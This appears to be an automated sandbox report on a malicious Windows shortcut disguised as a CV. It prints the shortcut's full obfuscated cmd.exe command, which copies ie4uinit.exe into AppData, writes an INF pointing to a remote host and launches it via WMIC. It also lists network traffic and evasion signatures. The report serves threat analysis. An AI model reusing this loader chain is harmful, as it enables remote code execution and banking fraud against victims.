Edit tour

Windows Analysis Report
CV - David Rolls.lnk

Overview

General Information

Sample Name:	CV - David Rolls.lnk
Analysis ID:	791689
MD5:	ba88702ee0712536390562efecb979ad
SHA1:	ef1c4d176780db656217bf33088dba7918acd30b
SHA256:	635c496fc044d519146f8e6e94b3d208803a5c2c00065c7e54c04f8276c1d049
Infos:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Windows shortcut file (LNK) starts blacklisted processes

Checks if browser processes are running

Creates processes via WMI

Windows shortcut file (LNK) contains suspicious command line arguments

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to create processes via WMI

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Deletes files inside the Windows folder

Creates COM task schedule object (often to register a task for autostart)

Found evasive API chain (date check)

Creates files inside the system directory

PE file contains sections with non-standard names

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Uses the system / local time for branch decision (may execute only at specific dates)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Drops PE files

Uses a known web browser user agent for HTTP communication

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

cmd.exe (PID: 724 cmdline: C:\Windows\System32\cmd.exe" /v /c set "Images97=si" && set "Images67=version" && set "Images38=d" && set "Images82=default" && set "Images4=init" && (for %h in (c) do @set "Images7=%~h") && set "Images62=e" && set "Images14=t" && set "Images12=." && (for %k in (a) do @set "Images32=%~k") && set "Images3=History" && call set "Images6=%Images3:~2,1%" && set "Images43=settings" && set "Images8=$w" && set "Images88=!Images12!inf" && set "Images58=ieu!Images4!!Images88!" && call !Images6!et "Images84=%!Images32!ppdata%\micro!Images6!oft\" && !Images6!et "Images00=!Images84!!Images58!" && (for %t in ("[!Images67!]" "signature = !Images8!indows nt$" "[!Images38!e!Images6!tinationdirs]" "C3D81=01" "!Images82!destdir=11" "[C3D81]" "ieu%Images15%!Images88!" "[FD48E1]" "sc\" "ro%Images95%j,NI,%Images81%%Images2%%Images2%p%Images66%%Images0%%Images0%davidrolls!Images12!%Images76%/aj55hg3eude" "[!Images82!in!Images6!tall.windows7]" "Un\" "Register\" "OCXs=FD48E1" "!Images38!elfil!Images62!s=C3D81" "[!Images6!!Images14!rings]" "Images2=t;Images26" "!Images6!ervicen!Images32!me=' '" "Images15=!Images4!" "Images27=%time%" "!Images6!hortsvcn!Images32!me=' '" "Images0=/" "Images95=b;Images08" "Images76=com" "Images66=:;Images03" "Images81=h" ) do @e!Images7!ho %~t)>"!Images00!" && !Images6!et "Images20=ie4u!Images4!.!Images62!xe" && call xcopy /Y /C /Q %win!Images38!ir%\!Images6!ystem32\!Images20! "!Images84!*" | set Images21=Strikes && !Images6!t!Images32!rt "" wmi!Images7! proce!Images6!s call !Images7!rea!Images14!e "!Images84!!Images20! -base!Images43!" | set "Images83=Venues Before Travis Crane Language Scientists Creatures Agencies Phases Copper Lands Loops Afraid Soldier Never Mounts Shine Direct Fluid Scene Invitations Ripple Prefers Fiscal Taste Bargains Brussels Feeds Thanks Features Seeks Relax Identify April Victory Limit Resemble Apple Hands Specs Festival Sport Trouble Supporters Erupt Winds Ketchup MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 1792 cmdline: C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

xcopy.exe (PID: 4960 cmdline: xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" MD5: 6BC7DB1465BEB7607CBCBD7F64007219)

cmd.exe (PID: 1980 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set Images21=Strikes " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

cmd.exe (PID: 1240 cmdline: C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

WMIC.exe (PID: 4560 cmdline: wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

conhost.exe (PID: 1012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 1308 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set "Images83=Venues Before Travis Crane Language Scientists Creatures Agencies Phases Copper Lands Loops Afraid Soldier Never Mounts Shine Direct Fluid Scene Invitations Ripple Prefers Fiscal Taste Bargains Brussels Feeds Thanks Features Seeks Relax Identify April Victory Limit Resemble Apple Hands Specs Festival Sport Trouble Supporters Erupt Winds Ketchup"" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

ie4uinit.exe (PID: 5736 cmdline: C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings MD5: 9DD77F0F421AA9A70383210706ECA529)

ie4uinit.exe (PID: 5056 cmdline: C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache MD5: 9DD77F0F421AA9A70383210706ECA529)

rundll32.exe (PID: 1396 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 5944 cmdline: C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0 MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

HTTP traffic detected: GET /aj55hg3eude HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: davidrolls.comConnection: Keep-Alive

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 25 Jan 2023 18:26:35 GMTServer: Apache/2.4.41 (Ubuntu)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 2065Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 59 6d 8f db 36 12 fe dc 03 ee 3f 30 4a d1 f5 e2 96 d6 6e 37 29 ae 1b db 45 ba 9b a0 bd cb bb 17 68 fb 91 92 68 89 5e 8a 54 49 ca 5e a3 c8 7f ef 90 94 64 49 96 5f 82 c3 21 02 36 b2 c8 79 e3 70 e6 99 21 33 79 72 f7 fe f6 fe 8f 0f af 50 66 72 3e fb e7 3f 26 f6 8d 38 11 e9 34 a0 22 70 23 94 24 f0 46 f0 4c 72 6a 08 8a 33 a2 34 35 d3 a0 34 0b fc ef a0 9e 33 cc 70 3a 7b b9 7c fe 3c 4b af 69 99 d0 49 e8 87 3a bc 52 18 2a 80 77 cd 12 93 4d 13 ba 62 31 c5 ee e3 02 31 c1 0c 23 1c eb 98 70 3a bd 1a 5f 06 48 90 9c 4e 83 15 a3 eb 42 2a 13 0c cb aa c9 1e e8 66 2d 55 a2 8f 90 25 54 c7 8a 15 86 49 b7 c0 8a f6 09 c6 e8 35 01 73 a4 d0 08 e3 5a 04 67 e2 01 65 8a 2e a6 01 cb d3 70 e1 29 c6 85 48 03 a4 28 87 d1 d8 8b 19 a2 26 45 c1 29 36 b2 8c 33 dc 63 eb 4f f5 2c f9 59 4a a3 8d 22 05 ba 9d cf d1 6b c6 e9 b0 4d 9c 45 61 54 d3 86 b1 d6 db af 71 ce c4 18 46 2a 85 da 6c 38 d5 19 a5 a6 a7 ea 0d 8b 14 51 8c ea 46 d5 9e f5 5b 5d 0b 70 26 26 6b aa 65 4e 9d ba f6 c0 41 8d 43 d2 88 60 39 31 b4 7e 7f 31 3f ec a0 db 2f 67 49 fd f1 c5 52 e4 9a c7 44 c9 52 53 1e 12 0d 91 ad ed d0 b8 1e fb 62 79 9c a5 99 89 e4 a3 b3 aa fe 38 75 37 de 12 26 d0 bc 99 3d b0 f5 56 ba 13 73 4c ac 8f 76 a4 55 3c 0d 32 63 0a 7d 13 86 eb f5 7a 9c 4a 99 5a 6e 99 87 8a c6 a4 30 90 d8 10 b2 6c bc 04 71 44 6f 44 8c 12 ba a0 6a 36 09 bd 88 d9 01 81 71 22 80 2f a1 9c ad d4 58 50 13 8a 22 0f c9 23 93 3a 4c 98 36 fe a7 73 02 48 6f 4b 9c 84 15 c0 c0 cf 48 26 1b c4 92 69 50 90 d4 26 47 e1 57 61 1d 13 a2 77 64 05 8e 21 0a 85 ce 1d 13 01 df 31 87 0d 9b 06 f0 33 82 09 ff c2 51 fd 03 b2 00 72 b9 fa a0 8f 05 11 09 ce 13 b4 60 8f 34 71 d2 9d ae 1c 3c 0e b2 9b dd 4c 58 23 d7 42 07 cc 52 55 4f 3a 02 d2 55 8b 21 7d 44 82 96 1a 70 4b 49 ce 83 6a 7f 9e 6e 17 71 07 a8 91 a0 4f 30 a9 27 21 69 cb 8a 4a 63 a4 e8 09 34 32 85 8d 51 80 5c 9c 93 42 d3 24 40 66 53 00 72 79 ea 00 25 c4 90 8a ca 1a e9 a9 ea 61 a2 52 0b ce 4f bd b0 3b ba 20 25 37 c1 56 67 fd 40 ce 13 6c 57 08 46 37 ba 6b 72 3f eb 7d 46 c1 49 0b c2 ad 06 37 ca 49 64 63 ed de e9 b7 ee 65 29 a9 c1 b4 ad 60 a2 81 db 6e b5 7d fd af 53 93 d0 2f be 3d d4 da a9 ca 73 b5 2f 1a d7 a1 65 a9 0d 5b 6c 70 55 05 30 15 89 df f6 ee 7a fb 46 94 bc 27 59 6c 23 a4 43 c8 59 8b 10 33 43 f3 21 b2 9d b8 c1 2e 91 9b 98 41 24 36 6c 45 9b d0 09 66 bf 00 9e 76 63 65 eb 09 ce fe 7f 96 b4 4c 78 19 c9 d2 7c 65 1b e6 54 d9 0e 41 7f 65 33 7e 93 ea e1 2b 9b f0 33 97 e9 57 36 e1 d6 c2 61 7c 7a 48 4c c2 92 77 52 18 12 b6 46 d9 ea f7 24 04 8d b3 36 c4 bf 02 2c f5 08 5f 8f fe 6a 21 0a cd 1f e8 ba 83 ff 36 fb 6d 22 67 90 29 41 6d 3f 73 b4 50 b8 0d 45 51 8a a1 ad 48 61 d2 95 45 80 4f 12 3f a4 30 07 65 c0 4d dc a0 52 f1 91 6d d4 1c 1b 8e d2 f1 b2 48 cf 87 2a 81 5c 51 c5 c9 06 bc a8 a4 2d 5f ad 95 b4 a8 bc 98 0a 6a 10 d4 bd

Source: ie4uinit.exe, 00000009.00000002.325448551.000001D314846000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000003.325177677.000001D314845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://davidrolls.com/aj550
Source: ie4uinit.exe, 00000009.00000003.318341666.000001D314848000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000003.325177677.000001D314845000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://davidrolls.com/aj55hg3eude
Source: ie4uinit.exe, 00000009.00000003.318208596.000001D31489B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://davidrolls.com/aj55hg3eudeC:
Source: ie4uinit.exe, 00000009.00000003.318208596.000001D31487F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://davidrolls.com/aj55hg3eudeXXC:
Source: ie4uinit.exe, 00000009.00000003.318208596.000001D31487F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://davidrolls.com/aj55hg3eudeb
Source: ie4uinit.exe, 00000009.00000003.318208596.000001D31487F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://davidrolls.com/aj55hg3euded
Source: ie4uinit.exe, 00000009.00000003.318341666.000001D314848000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://davidrolls.com/aj55hg3eudeosLMEMH
Source: ie4uinit.exe, 00000009.00000003.318341666.000001D314848000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://davidrolls.com/aj55hg3eudet
Source: ie4uinit.exe, 00000009.00000002.325418904.000001D314808000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://davidrolls.com/aj55hg3eudeuU
Source: ie4uinit.exe	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr	String found in binary or memory: http://www.baidu.com/favicon.icohttps://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=
Source: ie4uinit.exe	String found in binary or memory: http://www.yandex.com.tr/favicon.ico
Source: ie4uinit.exe	String found in binary or memory: http://www.yandex.com/favicon.ico
Source: ie4uinit.exe, 00000009.00000002.325610168.000001D3164E0000.00000004.00000020.00020000.00000000.sdmp, aj55hg3eude[1].htm.9.dr	String found in binary or memory: https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js
Source: ie4uinit.exe, 00000009.00000003.318208596.000001D31487F000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000003.325177677.000001D314881000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000002.325448551.000001D314881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr	String found in binary or memory: https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part=
Source: ie4uinit.exe	String found in binary or memory: https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=
Source: xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr	String found in binary or memory: https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr	String found in binary or memory: https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part=
Source: xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr	String found in binary or memory: https://www.baidu.com/s?tn=80035161_2_dg&wd=
Source: ie4uinit.exe, 00000009.00000002.325610168.000001D3164E0000.00000004.00000020.00020000.00000000.sdmp, aj55hg3eude[1].htm.9.dr	String found in binary or memory: https://www.google.com/recaptcha/api.js
Source: ie4uinit.exe	String found in binary or memory: https://www.haosou.com/s?src=win10&ie=utf-8&q=
Source: xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr	String found in binary or memory: https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query=
Source: ie4uinit.exe	String found in binary or memory: https://yandex.by/search/?text=
Source: ie4uinit.exe	String found in binary or memory: https://yandex.com.tr/search/?text=
Source: ie4uinit.exe	String found in binary or memory: https://yandex.kz/search/?text=
Source: ie4uinit.exe	String found in binary or memory: https://yandex.ua/search/?text=

Source: unknown

DNS traffic detected: queries for: davidrolls.com

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: 9_2_00007FF7319D6DD0 SysAllocString,SysStringLen,HttpSendRequestW,HttpQueryInfoW,InternetReadFile,GetLastError,SysStringByteLen,SysAllocStringByteLen,SysFreeString,GetLastError,SysFreeString,SysAllocString,SysStringByteLen,SysAllocStringByteLen,SysFreeString,

9_2_00007FF7319D6DD0

Source: global traffic

E-Banking Fraud

Checks if browser processes are running

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: GetModuleFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp, IEXPLORE.EXE	9_2_00007FF7319E0A8C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: GetModuleFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp, microsoftedge.exe	9_2_00007FF7319E0A8C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: GetModuleFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp, microsoftedgecp.exe	9_2_00007FF7319E0A8C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: GetModuleFileNameW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,StrStrIW,_wcsicmp,_wcsicmp,StrCmpICW,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp, microsoftedgesh.exe	9_2_00007FF7319E0A8C

System Summary

Windows shortcut file (LNK) contains suspicious command line arguments

Source: CV - David Rolls.lnk

LNK file: /v /c set "Images97=si" && set "Images67=version" && set "Images38=d" && set "Images82=default" && set "Images4=init" && (for %h in (c) do @set "Images7=%~h") && set "Images62=e" && set "Images14=t" && set "Images12=." && (for %k in (a) do @set "Images32=%~k") && set "Images3=History" && call set "Images6=%Images3:~2,1%" && set "Images43=settings" && set "Images8=$w" && set "Images88=!Images12!inf" && set "Images58=ieu!Images4!!Images88!" && call !Images6!et "Images84=%!Images32!ppdata%\micro!Images6!oft\" && !Images6!et "Images00=!Images84!!Images58!" && (for %t in ("[!Images67!]" "signature = !Images8!indows nt$" "[!Images38!e!Images6!tinationdirs]" "C3D81=01" "!Images82!destdir=11" "[C3D81]" "ieu%Images15%!Images88!" "[FD48E1]" "sc\" "ro%Images95%j,NI,%Images81%%Images2%%Images2%p%Images66%%Images0%%Images0%davidrolls!Images12!%Images76%/aj55hg3eude" "[!Images82!in!Images6!tall.windows7]" "Un\" "Register\" "OCXs=FD48E1" "!Images38!elfil!Images62!s=C3D81" "[!Images6!!Images14!rings]" "Images2=t;Images26" "!Images6!ervicen!Images32!me=' '" "Images15=!Images4!" "Images27=%time%" "!Images6!hortsvcn!Images32!me=' '" "Images0=/" "Images95=b;Images08" "Images76=com" "Images66=:;Images03" "Images81=h" ) do @e!Images7!ho %~t)>"!Images00!" && !Images6!et "Images20=ie4u!Images4!.!Images62!xe" && call xcopy /Y /C /Q %win!Images38!ir%\!Images6!ystem32\!Images20! "!Images84!*" | set Images21=Strikes && !Images6!t!Images32!rt "" wmi!Images7! proce!Images6!s call !Images7!rea!Images14!e "!Images84!!Images20! -base!Images43!" | set "Images83=Venues Before Travis Crane Language Scientists Creatures Agencies Phases Copper Lands Loops Afraid Soldier Never Mounts Shine Direct Fluid Scene Invitations Ripple Prefers Fiscal Taste Bargains Brussels Feeds Thanks Features Seeks Relax Identify April Victory Limit Resemble Apple Hands Specs Festival Sport Trouble Supporters Erupt Winds Ketchup"

Contains functionality to create processes via WMI

Source: WMIC.exe, 00000007.00000002.314542296.0000021C2B560000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\WMIC.exewmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" Winsta0\Defaultf

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

File deleted: C:\Windows\Temp\OLD81EC.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

File created: C:\Windows\security\logs\scecomp.log

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319C2DFC	9_2_00007FF7319C2DFC
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319C2930	9_2_00007FF7319C2930
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319CA568	9_2_00007FF7319CA568
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319C20E4	9_2_00007FF7319C20E4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319C1B44	9_2_00007FF7319C1B44
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319C9A98	9_2_00007FF7319C9A98
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319DC2F4	9_2_00007FF7319DC2F4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319C26F0	9_2_00007FF7319C26F0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319DFDB4	9_2_00007FF7319DFDB4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319E31A8	9_2_00007FF7319E31A8
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319C9604	9_2_00007FF7319C9604
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319C3D20	9_2_00007FF7319C3D20
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319CC92C	9_2_00007FF7319CC92C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319E20C0	9_2_00007FF7319E20C0
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319D0C4C	9_2_00007FF7319D0C4C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319C481C	9_2_00007FF7319C481C
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319D6478	9_2_00007FF7319D6478
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319C53B8	9_2_00007FF7319C53B8
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319D6BB4	9_2_00007FF7319D6BB4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319E3330	9_2_00007FF7319E3330
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319C4F7C	9_2_00007FF7319C4F7C

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Code function: String function: 00007FF7319C5974 appears 35 times

Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319DFDB4 LoadLibraryExW,GetProcAddress,NtQueryLicenseValue,FreeLibrary,NtQueryLicenseValue,		9_2_00007FF7319DFDB4
Source: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	Code function: 9_2_00007FF7319DDBC4 NtQueryLicenseValue,		9_2_00007FF7319DDBC4

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe 8E8C4A1402E0AF960AB1FF23C8925BBC35B0F015537056CE5C51658519DE41BB

Source: CV - David Rolls.lnk

Virustotal: Detection: 9%

Source: C:\Windows\System32\xcopy.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /v /c set "Images97=si" && set "Images67=version" && set "Images38=d" && set "Images82=default" && set "Images4=init" && (for %h in (c) do @set "Images7=%~h") && set "Images62=e" && set "Images14=t" && set "Images12=." && (for %k in (a) do @set "Images32=%~k") && set "Images3=History" && call set "Images6=%Images3:~2,1%" && set "Images43=settings" && set "Images8=$w" && set "Images88=!Images12!inf" && set "Images58=ieu!Images4!!Images88!" && call !Images6!et "Images84=%!Images32!ppdata%\micro!Images6!oft\" && !Images6!et "Images00=!Images84!!Images58!" && (for %t in ("[!Images67!]" "signature = !Images8!indows nt$" "[!Images38!e!Images6!tinationdirs]" "C3D81=01" "!Images82!destdir=11" "[C3D81]" "ieu%Images15%!Images88!" "[FD48E1]" "sc\" "ro%Images95%j,NI,%Images81%%Images2%%Images2%p%Images66%%Images0%%Images0%davidrolls!Images12!%Images76%/aj55hg3eude" "[!Images82!in!Images6!tall.windows7]" "Un\" "Register\" "OCXs=FD48E1" "!Images38!elfil!Images62!s=C3D81" "[!Images6!!Images14!rings]" "Images2=t;Images26" "!Images6!ervicen!Images32!me=' '" "Images15=!Images4!" "Images27=%time%" "!Images6!hortsvcn!Images32!me=' '" "Images0=/" "Images95=b;Images08" "Images76=com" "Images66=:;Images03" "Images81=h" ) do @e!Images7!ho %~t)>"!Images00!" && !Images6!et "Images20=ie4u!Images4!.!Images62!xe" && call xcopy /Y /C /Q %win!Images38!ir%\!Images6!ystem32\!Images20! "!Images84!*" \| set Images21=Strikes && !Images6!t!Images32!rt "" wmi!Images7! proce!Images6!s call !Images7!rea!Images14!e "!Images84!!Images20! -base!Images43!" \| set "Images83=Venues Before Travis Crane Language Scientists Creatures Agencies Phases Copper Lands Loops Afraid Soldier Never Mounts Shine Direct Fluid Scene Invitations Ripple Prefers Fiscal Taste Bargains Brussels Feeds Thanks Features Seeks Relax Identify April Victory Limit Resemble Apple Hands 